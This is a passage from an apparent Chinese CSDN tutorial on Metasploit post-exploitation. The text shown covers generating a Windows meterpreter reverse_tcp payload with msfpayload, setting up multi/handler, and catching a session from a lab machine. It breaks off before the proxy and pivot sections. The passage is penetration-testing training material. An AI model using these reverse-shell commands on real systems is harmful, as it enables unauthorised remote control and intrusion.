Metasploit渗透技巧:后渗透Meterpreter代理

本文介绍了如何使用Metasploit的Meterpreter进行渗透测试中的端口转发和代理设置。首先,通过msfpayload生成可执行文件,然后启动msfconsole监听反连端口,获取Meterpreter会话。接着,讲解了portfwd和pivot两种代理方法,包括端口转发和内网穿透。最后,提到了多级代理(如二级、三级代理)的应用,以应对复杂内网环境。通过这种方式,攻击者可以间接访问受限网络内的资源。
摘要由CSDN通过智能技术生成

本文将科普下metasploit隧道代理的使用技巧。

0×00 获取meterpreter

1.首先生成可执行文件

root@kali:~# msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.101.105 LPORT=444 X > meter.exe

[!] ************************************************************************

[!] *               The utility msfpayload is deprecated!                  *

[!] *              It will be removed on or about 2015-06-08               *

[!] *                   Please use msfvenom instead                        *

[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *

[!] ************************************************************************

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

 Length: 281

Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}

2.启动msfconsole,监听反连端口

root@kali:~# msfconsole

[*] Starting the Metasploit Framework console.../ 

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]

+ -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]

+ -- --=[ 342 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf exploit(handler) > set LPORT 444

LPORT => 444

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

Name  Current Setting  Required  Description

 ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)

   LHOST     0.0.0.0          yes       The listen address

   LPORT     444              yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

3.在xp-test1执行meter.exe,attacker获得 meterperter

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.101.107

[*] Meterpreter session 1 opened (192.168.101.105:444 -> 192.168.101.107:48019) at 2015-01-11 12:49:11 +0800

meterpreter > ipconfig

Interface  1

============

Name         : MS TCP Loopback interface

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值